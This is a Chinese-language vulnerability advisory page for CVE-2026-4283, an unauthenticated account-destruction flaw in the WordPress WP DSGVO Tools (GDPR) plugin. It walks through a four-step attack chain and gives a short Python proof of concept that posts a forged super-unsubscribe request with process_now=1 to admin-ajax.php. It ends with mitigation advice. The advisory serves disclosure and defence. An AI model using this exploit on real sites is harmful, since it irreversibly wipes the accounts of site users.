CVE-2026-4283 CVSS 9.1 严重

CVE-2026-4283: WP DSGVO Tools未授权账户销毁漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4283

漏洞类型

权限绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress WP DSGVO Tools (GDPR)

漏洞概述

WordPress WP DSGVO Tools (GDPR)插件在3.1.38及以下版本中存在严重漏洞。该漏洞允许未经身份验证的攻击者通过`super-unsubscribe` AJAX操作中的`process_now`参数绕过邮件确认流程，直接触发账户匿名化。由于所需的Nonce可通过`[unsubscribe_form]`短代码公开获取，攻击者可利用此漏洞永久销毁任何非管理员用户账户，包括随机化密码、覆盖用户名/邮箱、清除角色及评论信息。

技术细节

漏洞的核心在于`class-sp-dsgvo-ajax-action.php`中处理`super-unsubscribe`动作时，未对`process_now`参数进行严格的权限校验。默认情况下，该功能需要用户通过邮件链接确认操作以防止误删。然而，当攻击者在请求中设置`process_now=1`时，程序跳过邮件发送步骤，直接调用数据收集器和注销模型执行清理逻辑。该逻辑会重置用户密码、覆盖用户名和电子邮件地址、移除用户角色，并匿名化所有关联评论。攻击者只需访问包含`[unsubscribe_form]`短代码的页面即可获取有效的Nonce，随后构造包含受害者邮箱的恶意POST请求发送至`/wp-admin/admin-ajax.php`，即可无需认证完成攻击。

攻击链分析

STEP 1

信息收集

攻击者访问目标站点，寻找包含`[unsubscribe_form]`短代码的页面。

STEP 2

获取Nonce

从该页面的HTML源代码中提取CSRF Nonce值。

STEP 3

构造请求

构造包含`action=super-unsubscribe`、`process_now=1`、受害者邮箱及获取到的Nonce的POST请求。

STEP 4

执行攻击

向`/wp-admin/admin-ajax.php`发送请求，服务器直接执行账户销毁逻辑，导致非管理员账户数据被不可逆地破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests target = "http://example.com" # Assume the attacker finds a page with the shortcode page = requests.get(f"{target}/page-with-unsubscribe-form/") # Extract the nonce from the HTML response (pseudo-parsing) # nonce = parse_nonce(page.text) nonce = "EXTRACTED_NONCE_VALUE" payload = { "action": "super-unsubscribe", "process_now": "1", "email": "[email protected]", "security": nonce } response = requests.post(f"{target}/wp-admin/admin-ajax.php", data=payload) print(response.text)

影响范围

WP DSGVO Tools (GDPR) <= 3.1.38

防御指南

临时缓解措施

建议立即检查并更新插件版本。在更新前，可通过服务器配置规则（如Apache的.htaccess或Nginx配置）阻止对`admin-ajax.php`中`action=super-unsubscribe`的未授权访问，或者从站点中移除相关的短代码页面以防止Nonce泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表